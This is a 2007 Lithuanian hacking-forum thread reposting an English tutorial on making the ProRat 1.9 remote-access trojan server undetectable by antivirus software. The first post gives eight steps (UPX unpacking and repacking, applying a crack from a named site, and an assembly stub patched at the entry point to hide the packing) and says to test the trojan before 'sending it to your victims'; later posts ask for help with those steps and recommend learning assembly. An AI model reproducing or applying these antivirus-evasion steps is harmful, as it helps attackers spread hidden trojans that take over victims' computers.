[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/alt/php74/usr/share/pear')
Straipsniai.lt •undetectable ProRat 1.9 fix 1 trojan
Puslapis 11

undetectable ProRat 1.9 fix 1 trojan

Parašytas: 2007 03 11 16:32
live4hack
This Tutorial will show you how to make your ProRat v1.9-Fix01 server undetectable in 8 steps (in English Smile). Works for all Anti Virus systems!

Step 1: Download UPX v1.25 from http://upx.sourceforge.net
Step 2: Decompress the server. (upx -d server.exe)
Step 3: Download Furtif_00's AWESOME crack to bypass the edit protection from http://ch.ti.hack.site.voila.fr/ProPatch.exe
Step 4: Apply the patch. (propatch server.exe)
Step 5: Repack the server with UPX. (upx -9 server.exe)
Step 6: Open server.exe in a disassembler and go to the address of the OEP (Entrypoint + Image Base = OEP). If you do not know what I am talking about read about the PE file format first (and about assembly Cool). You should see something like "60 pushad". Scroll down a few pages until you see plenty of "00 add [eax],al". At this address you write the following commands which will prevent the Anti Virus systems from detecting that the file is UPX packed (and the AV's won't decode it in memory):
Quote:

push "address of the OEP" <== Patchaddress
push eax
pushfd
pushad
call "address of the next command (which is "retn 28")"
retn 28
inc ecx <==New program entrypoint
loop "Patchaddress"

(from governmentsecurity.org)

Step 7: Change the programs entrypoint to our new one in the PE header. You can do this with a hex editor or with some other tools.
Step 8: Scan the server (which should be undetectable now) and you had better test it before sending it to your victims. Smile

This patch can be used for all other trojans too. (Skip the cracking step)

Enjoy your undetectable server!!




gal kas bandet ar pawyko??? pac nenoriu bandyt ( per dauk tyngiu) :)

Parašytas: 2007 03 11 16:35
live4hack
be to nesuprantu situ vietu



Step 4: Apply the patch. (propatch server.exe)
Step 5: Repack the server with UPX. (upx -9 server.exe)
Step 6: Open server.exe in a disassembler and go to the address of the OEP (Entrypoint + Image Base = OEP). If you do not know what I am talking about read about the PE file format first (and about assembly Cool). You should see something like "60 pushad". Scroll down a few pages until you see plenty of "00 add [eax],al". At this address you write the following commands which will prevent the Anti Virus systems from detecting that the file is UPX packed (and the AV's won't decode it in memory):
Quote:

push "address of the OEP" <== Patchaddress
push eax
pushfd
pushad
call "address of the next command (which is "retn 28")"
retn 28
inc ecx <==New program entrypoint
loop "Patchaddress"

(from governmentsecurity.org)




gal ishverskit (pats tyngiu) 8)

Parašytas: 2007 03 11 17:15
GODhack
Is to kad supranti kitas vietas speju ne anglu kalboj pas tave problema.
Ir manau nelabai tau gausis cia reik truputi asambleri suprast.

Paskaitinek kelis paprastus asamblerio tutorialus tada grysk prie sito reikalo ir tada turetu gautis.